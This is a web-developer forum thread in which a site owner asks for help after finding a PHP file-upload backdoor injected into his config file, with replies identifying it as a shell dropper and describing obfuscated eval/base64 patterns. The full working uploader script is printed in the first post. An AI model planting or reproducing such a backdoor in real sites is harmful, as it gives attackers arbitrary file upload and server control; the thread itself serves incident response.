My website hacked.

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
donald.tbd
Forum Newbie
Posts: 2
Joined: Thu Oct 13, 2011 4:43 am

My website hacked.

Post by donald.tbd »

Hello,

I have been a web developer for about 10 years. I was asked by a friend to make a site for him because his previous site was hacked and messed up. Now i think i keep my security pretty tight and was positive something like that wouldnt happen to my site. The dumb thing that i did was keep the old site on the server (friend asked me to because there were some pictures there that she wanted later). I just moved it to a whole new directory and renamed it to old_site or something.

Now one day i find out that something is wrong. First there is an upload script written in one of my main config files and secend someone has allready uploaded something.
My main questions are:
1) Im pretty sure the attack came somehow through the old_site that i kept (now deleted) but even so how is it possible to directly edit my config file?
2) I was able to remove the upload script and the uploaded file but i dont know what did the uploaded file do? Im going to post the script uploaded, can anyone guess what was its purpouse?

The upload script in my config file:

Code: Select all

<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload BY akas06 [at] hackermail.com !!!</b><br><br>'; }
else { echo '<b>Upload BY akas06 [at] hackermail.com !!!</b><br><br>'; }
}
?>
õ
The uploaded file: http://justpaste.it/jbw (alot of code so i copyd it elsewhere)

Would be thankful for any help :)
User avatar
social_experiment
DevNet Master
Posts: 2793
Joined: Sun Feb 15, 2009 11:08 am
Location: .za

Re: My website hacked.

Post by social_experiment »

The script copies a file; copy() overwrites the destination file if it exists so the attacker could have overwritten a system file with their own copy.
“Don’t worry if it doesn’t work right. If everything did, you’d be out of a job.” - Mosher’s Law of Software Engineering
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: My website hacked.

Post by Mordred »

social_experiment wrote:The script copies a file; copy() overwrites the destination file if it exists so the attacker could have overwritten a system file with their own copy.
Only if it was writable by the user that runs apache/php, so - probably not.

The uploaded file is a backdoor/shell script.

Have you looked through your access and error logs?
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: My website hacked.

Post by Eric! »

I agree. The most common thing is a back door shell script is installed somewhere like c99 or r57. These tools are surprisingly efficient at compromising your server. Here's a tutorial on some of the things to look for in the log files.

http://25yearsofprogramming.com/blog/2010/20100315.htm

Yours looks like plain text, but a lot of these nasties start in an encrypted form of some sort and look like:

Code: Select all

<? eval(gzinflate(base64_decode('FJ3HjuvKkkV/pWd9AQ7oHfDwLuiN6K3ISYOe ov.......on and on'))); ?>
By the way, you should hire Mordred to audit your system. There could easily be a hole your new code that allows this upload. I always like to blame the other guy's code, but you don't want egg on your face if it happens again.
donald.tbd
Forum Newbie
Posts: 2
Joined: Thu Oct 13, 2011 4:43 am

Re: My website hacked.

Post by donald.tbd »

Eric! wrote:I agree. The most common thing is a back door shell script is installed somewhere like c99 or r57. These tools are surprisingly efficient at compromising your server. Here's a tutorial on some of the things to look for in the log files.

http://25yearsofprogramming.com/blog/2010/20100315.htm

Yours looks like plain text, but a lot of these nasties start in an encrypted form of some sort and look like:

Code: Select all

<? eval(gzinflate(base64_decode('FJ3HjuvKkkV/pWd9AQ7oHfDwLuiN6K3ISYOe ov.......on and on'))); ?>
By the way, you should hire Mordred to audit your system. There could easily be a hole your new code that allows this upload. I always like to blame the other guy's code, but you don't want egg on your face if it happens again.

How much does this audit cost :) ?
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: My website hacked.

Post by Mordred »

@Donald, I have a standing offer for 3 free hours of whitebox audit, check this: viewtopic.php?f=17&t=129090

@Eric!: Thanks for the promotion man ;)
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: My website hacked.

Post by Eric! »

You should start a website with your services and feedback from your free audits, including some sample results, your fees, etc. (Also so we can all sit around and try to hack it. :) )
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: My website hacked.

Post by Mordred »

Haha. No :)
Most of the issues are boooring. "Didn't escape", "Didn't check the extension" ... boooring. I've seen some cool ones though, have to dig them up.

---
Ha, found one, it was a fun game: viewtopic.php?f=34&t=76929
I remember the Skeleton project having a funny homebrew escaping solution that I exploited, but I can't find my post about it :/
JimJiang
Forum Newbie
Posts: 5
Joined: Wed Nov 09, 2011 7:32 am

Re: My website hacked.

Post by JimJiang »

Is someone upload php script?
For example:
I can upload a PHP file by you script
The php code is:
ad.php:
<?php
phpinfo();
?>
then I can run this script in order to get information about you server
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: My website hacked.

Post by Eric! »

@mordred eval() is definitely full of fun exploits. I was think more along the lines of you distilling the examples into something more security focused and using them to illustrate how many programmers never even realize how many holes they open up. You could use this as part of an on-line portfolio to help demonstrate your skills and how often confident programmers unknowingly open up a can of worms...yada yada. So why the haha no?
Post Reply